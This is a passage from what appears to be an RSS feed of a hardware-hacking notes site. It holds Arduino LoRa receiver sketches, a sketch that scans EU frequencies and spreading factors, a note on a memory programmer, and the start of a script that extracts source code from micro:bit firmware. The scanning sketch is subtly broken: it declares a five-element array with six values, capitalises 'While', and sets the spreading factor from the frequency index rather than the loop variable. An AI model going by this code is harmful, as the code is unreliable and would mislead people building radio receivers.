&lt;p&gt;&lt;a href="https://github.com/sandeepmistry/arduino-LoRa"&gt;arduino-LoRa&lt;/a&gt;&lt;br&gt;
use 868.1MHZ with SpreadFactor 10&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-c" data-lang="c"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;SPI.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;LoRa.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;setup&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;Serial&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;begin&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;9600&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;Serial&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;Serial&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;println&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;LoRa Receiver&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;LoRa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;begin&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mf"&gt;868.1E6&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;Serial&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;println&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;Starting LoRa failed!&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;LoRa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;setSpreadingFactor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;onReceive&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;packetSize&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;Serial&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;packet recv&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;// read packet
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;packetSize&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;Serial&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;LoRa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;loop&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;LoRa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;receive&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;LoRa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;onReceive&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;onReceive&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="bruteforce-all-the-eu-frequencies-and-the-spreadfactor" class="anchored-heading"&gt;Bruteforce all the EU frequencies and the SpreadFactor&lt;a class="heading-anchor" href="#bruteforce-all-the-eu-frequencies-and-the-spreadfactor" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-c" data-lang="c"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;SPI.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;LoRa.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kt"&gt;float&lt;/span&gt; &lt;span class="n"&gt;freq&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="mf"&gt;868.3E6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mf"&gt;868.5E6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mf"&gt;867.1E6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mf"&gt;867.5E6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mf"&gt;867.7E6&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mf"&gt;867.9E6&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;setup&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;Serial&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;begin&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;9600&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;Serial&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;Serial&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;println&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;LoRa Receiver&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;LoRa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;begin&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mf"&gt;868.1E6&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;Serial&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;println&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;Starting LoRa failed!&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;LoRa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;setSpreadingFactor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;onReceive&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;packetSize&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;Serial&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;packet recv&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;// read packet
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;packetSize&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;Serial&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;LoRa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;());&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;loop&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;LoRa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;receive&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;LoRa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;onReceive&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;onReceive&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nf"&gt;delay&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;5000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nf"&gt;While&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;for&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt; &lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;LoRa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;setFrequency&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;freq&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;for&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;7&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mi"&gt;12&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="c1"&gt;// loop on spreading factor is finish, set new freq
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;LoRa&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;setSpreadingFactor&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="nf"&gt;delay&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;5000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="display-rssi-of-the-packet" class="anchored-heading"&gt;Display RSSI of the packet&lt;a class="heading-anchor" href="#display-rssi-of-the-packet" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;The Received Signal Strength Indication (RSSI) is the received signal power in milliwatts and is measured in dBm.&lt;/p&gt;</description></item><item><title>Memory Programmer</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/memory-programmer/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/memory-programmer/</guid><description>&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://bokkapig.pages.dev/refs/hardware/assets/memory-programmer-rt809h.jpg" alt="RT809H" width="1000" height="927" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;RT809H&lt;/figcaption&gt;&lt;/figure&gt;&lt;p&gt;RT809H with multiple adapters/sockets for eMMC/NAND Flash&lt;/p&gt;</description></item><item><title>Micro::bit</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/micro-bit/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/micro-bit/</guid><description>&lt;h2 id="extract-source-code-from-firmware" class="anchored-heading"&gt;Extract source code from firmware&lt;a class="heading-anchor" href="#extract-source-code-from-firmware" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;When the source has been build from &lt;a href="https://makecode.microbit.org/#editor"&gt;makecode.microbit.org&lt;/a&gt;, the Javascript code is embedded into the firmware.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;bincopy&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;lzma&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;sys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;subprocess&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;json&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;# split firmware into raw and code&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;r&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;fwstring&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;fwsplit&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;fwstring&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;fw_raw.hex&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;w&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;g&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
